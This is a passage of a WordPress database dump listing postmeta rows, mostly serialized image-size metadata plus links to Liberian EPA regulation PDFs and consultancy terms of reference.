:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:443310;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:21:\"Template-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1101137;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"Template-600x373.png\";s:5:\"width\";i:600;s:6:\"height\";i:373;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:380706;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"Template-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:600205;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:21:\"Template-1189x640.png\";s:5:\"width\";i:1189;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1030990;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37056,5457,'_wp_old_date','2025-06-24'),(37057,5457,'_thumbnail_id','5459'),(37058,5457,'_edit_last','38'),(37059,5457,'kava_extra_enable_breadcrumbs','inherit'),(37060,5457,'post_formats',''),(37061,5457,'gallery_tab',''),(37062,5457,'kava_extra_gallery_images',''),(37063,5457,'link_tab',''),(37064,5457,'kava_extra_link',''),(37065,5457,'kava_extra_link_target','_blank'),(37066,5457,'quote_tab',''),(37067,5457,'kava_extra_quote_text',''),(37068,5457,'kava_extra_quote_cite',''),(37069,5457,'audio_tab',''),(37070,5457,'kava_extra_audio',''),(37071,5457,'kava_extra_audio_loop','false'),(37072,5457,'kava_extra_audio_autoplay','false'),(37073,5457,'kava_extra_audio_preload','false'),(37074,5457,'video_tab',''),(37075,5457,'kava_extra_video_type','library'),(37076,5457,'kava_extra_video_library',''),(37077,5457,'kava_extra_video_external',''),(37078,5457,'kava_extra_video_poster',''),(37079,5457,'kava_extra_video_width','770'),(37080,5457,'kava_extra_video_height','480'),(37081,5457,'kava_extra_video_loop','false'),(37082,5457,'kava_extra_video_autoplay','false'),(37083,5457,'kava_extra_video_preload','false'),(37088,5461,'_edit_lock','1750774916:38'),(37089,5461,'_last_editor_used_jetpack','block-editor'),(37090,5462,'_wp_attached_file','2025/06/News.jpeg'),(37091,5462,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1592;s:4:\"file\";s:17:\"2025/06/News.jpeg\";s:8:\"filesize\";i:726403;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"News-300x233.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17982;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"News-1024x796.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136342;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"News-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7993;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"News-768x597.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81537;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"News-1536x1194.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:269977;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"News-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23278;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:16:\"News-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4938;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:17:\"News-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15203;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:17:\"News-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35643;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:17:\"News-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40506;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:17:\"News-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50660;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:18:\"News-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123627;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:19:\"News-1920x1080.jpeg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:287967;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:17:\"News-600x466.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:466;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53846;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:17:\"News-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76455;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:18:\"News-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129174;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37094,5461,'_thumbnail_id','5462'),(37095,5461,'_edit_last','38'),(37096,5461,'kava_extra_enable_breadcrumbs','inherit'),(37097,5461,'post_formats',''),(37098,5461,'gallery_tab',''),(37099,5461,'kava_extra_gallery_images',''),(37100,5461,'link_tab',''),(37101,5461,'kava_extra_link',''),(37102,5461,'kava_extra_link_target','_blank'),(37103,5461,'quote_tab',''),(37104,5461,'kava_extra_quote_text',''),(37105,5461,'kava_extra_quote_cite',''),(37106,5461,'audio_tab',''),(37107,5461,'kava_extra_audio',''),(37108,5461,'kava_extra_audio_loop','false'),(37109,5461,'kava_extra_audio_autoplay','false'),(37110,5461,'kava_extra_audio_preload','false'),(37111,5461,'video_tab',''),(37112,5461,'kava_extra_video_type','library'),(37113,5461,'kava_extra_video_library',''),(37114,5461,'kava_extra_video_external',''),(37115,5461,'kava_extra_video_poster',''),(37116,5461,'kava_extra_video_width','770'),(37117,5461,'kava_extra_video_height','480'),(37118,5461,'kava_extra_video_loop','false'),(37119,5461,'kava_extra_video_autoplay','false'),(37120,5461,'kava_extra_video_preload','false'),(37121,5464,'_edit_lock','1750790689:38'),(37122,5464,'_last_editor_used_jetpack','block-editor'),(37123,5465,'_wp_attached_file','2025/06/WhatsApp-Image-2025-06-24-at-17.54.56.jpeg'),(37124,5465,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1280;s:4:\"file\";s:50:\"2025/06/WhatsApp-Image-2025-06-24-at-17.54.56.jpeg\";s:8:\"filesize\";i:130196;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17450;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-06-24-at-17.54.56-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97690;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8142;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-06-24-at-17.54.56-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97690;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21165;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-06-24-at-17.54.56-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5035;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14662;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31563;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35294;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42595;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-960x650.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82270;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-06-24-at-17.54.56-960x1080.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130143;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-600x800.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69121;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61570;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-06-24-at-17.54.56-960x640.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76895;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37127,5464,'_thumbnail_id','5465'),(37128,5464,'_edit_last','38'),(37131,5464,'kava_extra_enable_breadcrumbs','inherit'),(37132,5464,'post_formats',''),(37133,5464,'gallery_tab',''),(37134,5464,'kava_extra_gallery_images',''),(37135,5464,'link_tab',''),(37136,5464,'kava_extra_link',''),(37137,5464,'kava_extra_link_target','_blank'),(37138,5464,'quote_tab',''),(37139,5464,'kava_extra_quote_text',''),(37140,5464,'kava_extra_quote_cite',''),(37141,5464,'audio_tab',''),(37142,5464,'kava_extra_audio',''),(37143,5464,'kava_extra_audio_loop','false'),(37144,5464,'kava_extra_audio_autoplay','false'),(37145,5464,'kava_extra_audio_preload','false'),(37146,5464,'video_tab',''),(37147,5464,'kava_extra_video_type','library'),(37148,5464,'kava_extra_video_library',''),(37149,5464,'kava_extra_video_external',''),(37150,5464,'kava_extra_video_poster',''),(37151,5464,'kava_extra_video_width','770'),(37152,5464,'kava_extra_video_height','480'),(37153,5464,'kava_extra_video_loop','false'),(37154,5464,'kava_extra_video_autoplay','false'),(37155,5464,'kava_extra_video_preload','false'),(37156,5467,'_last_editor_used_jetpack','classic-editor'),(37157,5467,'_edit_lock','1750838427:38'),(37158,5467,'_edit_last','38'),(37159,5468,'_wp_attached_file','2025/06/Screenshot-2025-06-24-at-6.55.49-AM.png'),(37160,5468,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1600;s:4:\"file\";s:47:\"2025/06/Screenshot-2025-06-24-at-6.55.49-AM.png\";s:8:\"filesize\";i:625544;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-300x188.png\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18755;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-24-at-6.55.49-AM-1024x640.png\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:97263;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-768x480.png\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:73176;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-24-at-6.55.49-AM-1536x960.png\";s:5:\"width\";i:1536;s:6:\"height\";i:960;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:230971;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"Screenshot-2025-06-24-at-6.55.49-AM-2048x1280.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1280;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:326976;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43792;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-06-24-at-6.55.49-AM-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5200;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23946;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41906;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68084;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116089;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-24-at-6.55.49-AM-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:290298;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:49:\"Screenshot-2025-06-24-at-6.55.49-AM-1920x1080.png\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:327729;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-600x375.png\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:63751;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-24-at-6.55.49-AM-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94837;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-24-at-6.55.49-AM-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:140460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37161,5469,'_wp_attached_file','2025/06/Noise-Regulations-of-Liberia-No-2-17.pdf'),(37162,5469,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:577837;}'),(37163,5467,'_wp_page_template','default'),(37164,5467,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/06/Noise-Regulations-of-Liberia-No-2-17.pdf'),(37165,5467,'by','EPA'),(37166,5467,'year','July 04,2017'),(37167,5467,'_pods_document_cover_image','a:1:{i:0;i:5468;}'),(37169,5467,'_pods_attached_document','a:1:{i:0;i:5469;}'),(37173,5467,'document_cover_image','5468'),(37174,5467,'attached_document','5469'),(37175,5472,'_last_editor_used_jetpack','classic-editor'),(37176,5472,'_edit_lock','1750838154:38'),(37177,5472,'_edit_last','38'),(37178,5473,'_wp_attached_file','2025/06/Screenshot-2025-06-25-at-7.42.38-AM.png'),(37179,5473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:944;s:6:\"height\";i:1223;s:4:\"file\";s:47:\"2025/06/Screenshot-2025-06-25-at-7.42.38-AM.png\";s:8:\"filesize\";i:119082;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32161;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-25-at-7.42.38-AM-790x1024.png\";s:5:\"width\";i:790;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:350832;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14263;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-768x995.png\";s:5:\"width\";i:768;s:6:\"height\";i:995;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:214968;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48039;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:46:\"Screenshot-2025-06-25-at-7.42.38-AM-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7835;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32574;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62211;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78521;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115921;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-944x650.png\";s:5:\"width\";i:944;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32364;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:48:\"Screenshot-2025-06-25-at-7.42.38-AM-944x1080.png\";s:5:\"width\";i:944;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95506;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-600x777.png\";s:5:\"width\";i:600;s:6:\"height\";i:777;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:172298;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:135126;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2025-06-25-at-7.42.38-AM-944x640.png\";s:5:\"width\";i:944;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32284;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37180,5474,'_wp_attached_file','2025/06/Asbestos-Regulation-No-1-17.pdf'),(37181,5474,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:191760;}'),(37182,5472,'_wp_page_template','default'),(37183,5472,'download_link','https://ekmsliberia.info/wp-content/uploads/2025/06/Asbestos-Regulation-No-1-17.pdf'),(37184,5472,'by','EPA'),(37185,5472,'year','April 07, 2017'),(37186,5472,'_pods_document_cover_image','a:1:{i:0;i:5473;}'),(37188,5472,'_pods_attached_document','a:1:{i:0;i:5474;}'),(37192,5472,'document_cover_image','5473'),(37193,5472,'attached_document','5474'),(37194,5476,'_last_editor_used_jetpack','classic-editor'),(37195,5476,'_edit_lock','1750844190:38'),(37196,5476,'_edit_last','38'),(37197,5477,'_wp_attached_file','2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx'),(37198,5477,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:174533;}'),(37199,5476,'_wp_page_template','default'),(37200,5476,'closed_date','2025-07-16'),(37201,5476,'owner','EPA'),(37202,5476,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx'),(37203,5484,'_last_editor_used_jetpack','classic-editor'),(37204,5484,'_edit_lock','1751024074:38'),(37205,5484,'_edit_last','38'),(37206,5484,'_wp_page_template','default'),(37207,5486,'_wp_attached_file','2025/06/Terms-of-Reference-BTR1NC3-Finalization-of-Reports-for-Submission_EPALiberia.pdf'),(37208,5486,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:613871;}'),(37209,5484,'closed_date','2025-07-10'),(37210,5484,'owner','EPA/ MEAs'),(37211,5484,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/06/Terms-of-Reference-BTR1NC3-Finalization-of-Reports-for-Submission_EPALiberia.pdf'),(37212,5489,'_edit_lock','1751611491:38'),(37213,5489,'_last_editor_used_jetpack','block-editor'),(37214,5490,'_wp_attached_file','2025/06/RPrGpurS_400x400.jpg'),(37215,5490,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:240;s:6:\"height\";i:240;s:4:\"file\";s:28:\"2025/06/RPrGpurS_400x400.jpg\";s:8:\"filesize\";i:13560;s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"RPrGpurS_400x400-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6281;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:27:\"RPrGpurS_400x400-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3834;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:28:\"RPrGpurS_400x400-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10822;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37218,5489,'_thumbnail_id','5490'),(37219,5489,'_edit_last','38'),(37220,5489,'kava_extra_enable_breadcrumbs','inherit'),(37221,5489,'post_formats',''),(37222,5489,'gallery_tab',''),(37223,5489,'kava_extra_gallery_images',''),(37224,5489,'link_tab',''),(37225,5489,'kava_extra_link',''),(37226,5489,'kava_extra_link_target','_blank'),(37227,5489,'quote_tab',''),(37228,5489,'kava_extra_quote_text',''),(37229,5489,'kava_extra_quote_cite',''),(37230,5489,'audio_tab',''),(37231,5489,'kava_extra_audio',''),(37232,5489,'ka